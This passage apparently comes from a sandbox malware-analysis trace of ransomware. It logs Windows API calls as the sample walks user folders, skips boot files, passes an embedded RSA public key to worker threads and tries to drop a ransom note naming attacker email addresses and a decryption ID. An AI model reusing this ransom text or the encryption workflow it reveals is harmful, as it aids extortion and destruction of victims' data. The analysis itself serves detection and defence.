(in: lpFileName="C:\\Users\\Default\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0202.690] PathFindFileNameW (pszPath="C:\\Users\\Default\\Desktop") returned="Desktop" [0202.690] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0202.690] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0202.690] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0202.690] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0202.690] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0202.690] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0202.690] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Desktop\\") returned 29 [0202.690] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Desktop\\") [0202.691] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0202.691] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0202.691] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\") returned="\\\\?\\C:\\Users\\Default\\Desktop\\" [0202.691] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe28 [0202.691] Sleep (dwMilliseconds=0x96) [0202.837] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0202.837] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0202.837] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0202.837] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0202.837] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Desktop\\*.*") returned="C:\\Users\\Default\\Desktop\\*.*" [0202.837] SetErrorMode (uMode=0x1) returned 0x1 [0202.837] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Desktop\\_HELP_INSTRUCTION.TXT") returned 46 [0202.837] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0202.837] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0202.837] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xe2c) returned 0x0 [0202.838] RegQueryValueExW (in: hKey=0xe2c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b9c28, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43b9c28*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0202.838] RegCloseKey (hKey=0xe2c) returned 0x0 [0202.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0202.838] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0202.838] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\desktop\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0202.838] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\desktop\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0202.838] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0202.838] PathFindFileNameW (pszPath="C:\\Users\\Default\\Desktop") returned="Desktop" [0202.838] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0202.838] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0202.838] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0202.838] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0202.838] SetErrorMode (uMode=0x1) returned 0x1 [0202.839] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0202.839] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0202.839] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Documents\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0202.839] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\*.*") returned="C:\\Users\\Default\\Documents\\*.*" [0202.839] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0202.839] PathFindFileNameW (pszPath="C:\\Users\\Default\\Documents") returned="Documents" [0202.839] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0202.839] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0202.839] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0202.839] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0202.840] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0202.840] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0202.840] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Documents\\") returned 31 [0202.840] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Documents\\") [0202.840] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0202.840] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0202.840] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\") returned="\\\\?\\C:\\Users\\Default\\Documents\\" [0202.840] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe34 [0202.840] Sleep (dwMilliseconds=0x96) [0202.992] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0202.992] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0202.993] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0202.993] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0202.993] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0202.993] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0202.993] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0202.993] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\*.*") returned="C:\\Users\\Default\\Documents\\*.*" [0202.993] SetErrorMode (uMode=0x1) returned 0x1 [0202.993] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Documents\\_HELP_INSTRUCTION.TXT") returned 48 [0202.994] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0202.994] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0202.994] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xe38) returned 0x0 [0202.994] RegQueryValueExW (in: hKey=0xe38, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b9ea0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43b9ea0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0202.994] RegCloseKey (hKey=0xe38) returned 0x0 [0202.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0202.994] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0202.994] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0202.995] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0202.997] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0202.997] PathFindFileNameW (pszPath="C:\\Users\\Default\\Documents") returned="Documents" [0202.997] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0202.997] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0202.997] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0202.997] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music" [0202.997] SetErrorMode (uMode=0x1) returned 0x1 [0202.997] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music" [0202.998] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\") returned="C:\\Users\\Default\\Documents\\My Music\\" [0202.998] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Documents\\My Music\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\") returned="C:\\Users\\Default\\Documents\\My Music\\" [0202.998] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\*.*") returned="C:\\Users\\Default\\Documents\\My Music\\*.*" [0202.998] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0202.998] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0202.998] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music" [0202.998] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\*.*") returned="C:\\Users\\Default\\Documents\\My Music\\*.*" [0202.998] SetErrorMode (uMode=0x1) returned 0x1 [0202.998] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\_HELP_INSTRUCTION.TXT") returned 57 [0202.998] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0202.998] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0202.998] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xe3c) returned 0x0 [0202.998] RegQueryValueExW (in: hKey=0xe3c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43ba0d0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43ba0d0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0202.999] RegCloseKey (hKey=0xe3c) returned 0x0 [0202.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0202.999] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0202.999] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0202.999] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0202.999] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0202.999] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0202.999] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0202.999] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0202.999] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0202.999] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0202.999] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0202.999] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures" [0202.999] SetErrorMode (uMode=0x1) returned 0x1 [0203.000] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures" [0203.000] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\") returned="C:\\Users\\Default\\Documents\\My Pictures\\" [0203.000] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Documents\\My Pictures\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\") returned="C:\\Users\\Default\\Documents\\My Pictures\\" [0203.000] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Default\\Documents\\My Pictures\\*.*" [0203.000] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0203.000] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0203.000] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures" [0203.000] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Default\\Documents\\My Pictures\\*.*" [0203.000] SetErrorMode (uMode=0x1) returned 0x1 [0203.000] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT") returned 60 [0203.000] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0203.000] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0203.000] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xe3c) returned 0x0 [0203.000] RegQueryValueExW (in: hKey=0xe3c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43ba300, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43ba300*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0203.001] RegCloseKey (hKey=0xe3c) returned 0x0 [0203.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0203.001] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0203.001] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0203.001] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0203.001] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0203.001] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0203.001] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0203.001] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0203.001] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0203.001] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0203.001] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0203.001] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos" 